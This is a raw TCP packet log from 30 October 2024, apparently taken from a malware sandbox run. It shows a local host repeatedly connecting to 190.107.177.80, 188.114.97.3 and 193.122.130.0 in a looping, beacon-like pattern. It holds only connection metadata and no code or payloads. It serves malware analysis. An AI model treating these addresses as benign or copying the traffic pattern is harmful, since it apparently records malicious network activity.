                                                                    Oct 30, 2024 01:42:03.889539957 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.952909946 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.953026056 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.004532099 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.004618883 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.005105019 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.005203962 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.005970001 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.006042004 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.023869991 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.023971081 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.074553967 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.074714899 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.121649981 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.121747971 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.122023106 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.122101068 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.122888088 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.122960091 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.145368099 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.145445108 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.192424059 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.192504883 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.238558054 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.238667011 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.239051104 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.239131927 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.239856958 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.239933968 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.258753061 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.258835077 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.308650017 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.308757067 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.355443001 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.355529070 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.355741978 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.355814934 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.356920958 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.356992006 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.374985933 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.375061035 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.425787926 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.425872087 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.426130056 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.426202059 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.472790003 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.472866058 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.473433971 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.473505974 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.474366903 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.474436998 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.492269039 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.492347002 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.542700052 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.542824984 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.587599993 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.587716103 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.589623928 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.589704037 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.590590000 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.590662956 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.591413975 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.591490030 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.609184027 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.609287977 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.659867048 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.660017967 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.704674959 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.704793930 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.706671000 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.706749916 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.707598925 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.707670927 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.708146095 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.708219051 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.726125002 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.726238966 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.776621103 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.776731968 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.777101994 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.777172089 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.823492050 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.823601961 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.824199915 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.824263096 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.825053930 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.825129032 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.825220108 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.825287104 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.843189955 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.843280077 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.894431114 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.894527912 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.938761950 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.938889980 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.940634966 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.940740108 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.941488028 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.941570997 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.941917896 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.941998959 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.942749977 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.942826986 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:04.960375071 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:04.960577965 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:05.011379004 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:05.011454105 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:05.055795908 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:05.055875063 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:05.057579994 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:05.057653904 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:05.058330059 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:05.058403015 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:05.058644056 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:05.058711052 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:05.059303999 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:05.059374094 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:05.077665091 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:05.077800989 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:05.077852011 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:05.077856064 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:05.077891111 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:05.077914953 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:05.083575964 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:06.390564919 CET4973180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:06.396089077 CET8049731193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:06.396158934 CET4973180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:06.396419048 CET4973180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:06.401720047 CET8049731193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:07.049274921 CET8049731193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:07.053508997 CET4973180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:07.059348106 CET8049731193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:07.209347010 CET8049731193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:07.252326965 CET4973180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:07.402398109 CET49732443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:07.402429104 CET44349732188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:07.402508974 CET49732443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:07.438471079 CET49732443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:07.438483953 CET44349732188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:08.052522898 CET44349732188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:08.052617073 CET49732443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:08.057403088 CET49732443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:08.057413101 CET44349732188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:08.057698965 CET44349732188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:08.111565113 CET49732443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:08.159332037 CET44349732188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:08.253804922 CET44349732188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:08.253843069 CET44349732188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:08.253993034 CET49732443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:08.288602114 CET49732443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:08.293610096 CET4973180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:08.299181938 CET8049731193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:08.454603910 CET8049731193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:08.456881046 CET49733443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:08.456914902 CET44349733188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:08.457022905 CET49733443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:08.457243919 CET49733443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:08.457258940 CET44349733188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:08.502332926 CET4973180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:09.066837072 CET44349733188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:09.068941116 CET49733443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:09.068960905 CET44349733188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:09.210166931 CET44349733188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:09.210206032 CET44349733188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:09.210287094 CET49733443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:09.211199045 CET49733443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:09.215462923 CET4973180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:09.217123985 CET4973480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:09.221395016 CET8049731193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:09.221512079 CET4973180192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:09.222528934 CET8049734193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:09.222625971 CET4973480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:09.222760916 CET4973480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:09.228104115 CET8049734193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:09.896565914 CET8049734193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:09.897975922 CET49735443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:09.898010969 CET44349735188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:09.898104906 CET49735443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:09.898375034 CET49735443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:09.898390055 CET44349735188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:09.939824104 CET4973480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:10.507795095 CET44349735188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:10.509895086 CET49735443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:10.509926081 CET44349735188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:10.658406019 CET44349735188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:10.658447981 CET44349735188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:10.658638954 CET49735443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:10.659018993 CET49735443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:10.664361000 CET4973680192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:10.669751883 CET8049736193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:10.669902086 CET4973680192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:10.670017958 CET4973680192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:10.675385952 CET8049736193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:11.326838017 CET8049736193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:11.328480959 CET49737443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:11.328505039 CET44349737188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:11.328588009 CET49737443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:11.328864098 CET49737443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:11.328872919 CET44349737188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:11.377306938 CET4973680192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:11.936861992 CET44349737188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:11.938775063 CET49737443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:11.938791037 CET44349737188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:12.092511892 CET44349737188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:12.092552900 CET44349737188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:12.092644930 CET49737443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:12.093158960 CET49737443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:12.098653078 CET4973680192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:12.099904060 CET4973880192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:12.104624033 CET8049736193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:12.104744911 CET4973680192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:12.105292082 CET8049738193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:12.105372906 CET4973880192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:12.105473995 CET4973880192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:12.110769033 CET8049738193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:12.776197910 CET8049738193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:12.777998924 CET49739443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:12.778021097 CET44349739188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:12.778101921 CET49739443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:12.778389931 CET49739443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:12.778400898 CET44349739188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:12.830436945 CET4973880192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:13.389214039 CET44349739188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:13.391288042 CET49739443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:13.391303062 CET44349739188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:13.555778980 CET44349739188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:13.555819035 CET44349739188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:13.555885077 CET49739443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:13.556288004 CET49739443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:13.559202909 CET4973880192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:13.560153961 CET4974080192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:13.565710068 CET8049738193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:13.565748930 CET8049740193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:13.565785885 CET4973880192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:13.565831900 CET4974080192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:13.565906048 CET4974080192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:13.571204901 CET8049740193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:14.225440025 CET8049740193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:14.226628065 CET49741443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:14.226669073 CET44349741188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:14.226742983 CET49741443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:14.227015018 CET49741443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:14.227032900 CET44349741188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:14.267936945 CET4974080192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:14.841017962 CET44349741188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:14.894340038 CET49741443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:14.902787924 CET49741443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:14.902801991 CET44349741188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:15.065720081 CET44349741188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:15.065769911 CET44349741188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:15.065932035 CET49741443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:15.066215038 CET49741443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:15.099311113 CET4974080192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:15.100404024 CET4974280192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:15.105264902 CET8049740193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:15.105324030 CET4974080192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:15.105747938 CET8049742193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:15.105808020 CET4974280192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:15.105926991 CET4974280192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:15.111298084 CET8049742193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:15.775194883 CET8049742193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:15.776180029 CET49743443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:15.776235104 CET44349743188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:15.776304960 CET49743443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:15.776559114 CET49743443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:15.776581049 CET44349743188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:15.830446959 CET4974280192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:16.394476891 CET44349743188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:16.396491051 CET49743443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:16.396562099 CET44349743188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:16.546577930 CET44349743188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:16.546639919 CET44349743188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:16.546895981 CET49743443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:16.547190905 CET49743443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:16.550842047 CET4974280192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:16.551578999 CET4974480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:16.556653023 CET8049742193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:16.556714058 CET4974280192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:16.556972980 CET8049744193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:16.557101965 CET4974480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:16.557185888 CET4974480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:16.562700033 CET8049744193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:17.229612112 CET8049744193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:17.231360912 CET49746443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:17.231389046 CET44349746188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:17.231476068 CET49746443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:17.231796026 CET49746443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:17.231806040 CET44349746188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:17.283576012 CET4974480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:17.847311020 CET44349746188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:17.849106073 CET49746443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:17.849123955 CET44349746188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:18.013618946 CET44349746188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:18.013761997 CET44349746188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:18.013818979 CET49746443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:18.014209032 CET49746443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:18.805541992 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:18.805634022 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:18.805716991 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:18.811680079 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:18.811709881 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:19.659892082 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:19.659995079 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:19.667500019 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:19.667534113 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:19.667924881 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:19.721117020 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:19.946310997 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:19.987360954 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.193931103 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.193998098 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.194019079 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.194036007 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.194202900 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.194202900 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.194256067 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.236874104 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.319363117 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.319386005 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.319402933 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.319430113 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.319472075 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.320194006 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.320211887 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.320261955 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.320285082 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.320770979 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.320790052 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.320837021 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.320859909 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.443391085 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.443417072 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.443470955 CET49749443192.168.2.4190.107.177.80
